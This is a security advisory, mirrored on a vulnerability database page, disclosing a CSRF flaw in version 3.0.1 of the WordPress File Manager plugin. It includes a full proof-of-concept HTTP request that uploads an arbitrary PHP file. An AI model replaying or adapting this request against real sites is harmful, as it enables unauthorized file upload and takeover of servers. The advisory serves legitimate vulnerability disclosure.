Vulners
Lucene search
WordPress File Manager 3.0.1 Cross Site Request Forgery
🗓️ 03 Mar 2017 00:00:00Reported by David VaartjesType 
packetstorm🔗 packetstormsecurity.com👁 44 Views
`------------------------------------------------------------------------
Cross-Site Request Forgery in File Manager WordPress plugin
------------------------------------------------------------------------
David Vaartjes, July 2016
------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Request Forgery (CSRF) vulnerability was found in the File
Manager WordPress Plugin. Among others, this issue can be used to upload
arbitrary PHP files to the server.
------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160712-0029
------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was succesfully tested on the File Manager WordPress Plugin
version 3.0.1.
------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
There is currently no fix available.
------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_file_manager_wordpress_plugin.html
The upload form used by the plugin has no protection against CSRF attacks. As a result an attacker can for example upload arbitrary PHP files to the server.
Please note that the target user needs to be logged in.
Proof of concept
The target parameter holds a Base64-encoded destination path. By using the proof of concept request below a file named info.php is uploaded to the /wp-content/uploads/file-manager/ directory.
When uploaded, this file can be requested from the outside as follows:
http://<wp-server>/wp-content/uploads/file-manager/info.php
Request:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: <wp-server>
Cookie: ALL_YOUR_WP_COOKIES
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------6427194103423794601262893907
-----------------------------6427194103423794601262893907
Content-Disposition: form-data; name="cmd"
upload
-----------------------------6427194103423794601262893907
Content-Disposition: form-data; name="target"
l1_d3AtY29udGVudC91cGxvYWRzL2ZpbGUtbWFuYWdlcg
-----------------------------6427194103423794601262893907
Content-Disposition: form-data; name="suffix"
~
-----------------------------6427194103423794601262893907
Content-Disposition: form-data; name="action"
connector
-----------------------------6427194103423794601262893907
Content-Disposition: form-data; name="upload[]"; filename="info.php"
Content-Type: text/php
<?php
phpinfo();
?>
-----------------------------6427194103423794601262893907--
------------------------------------------------------------------------
Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its
goal is to contribute to the security of popular, widely used OSS
projects in a fun and educational way.
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
03 Mar 2017 00:00Current
0.3Low risk
Vulners AI Score0.3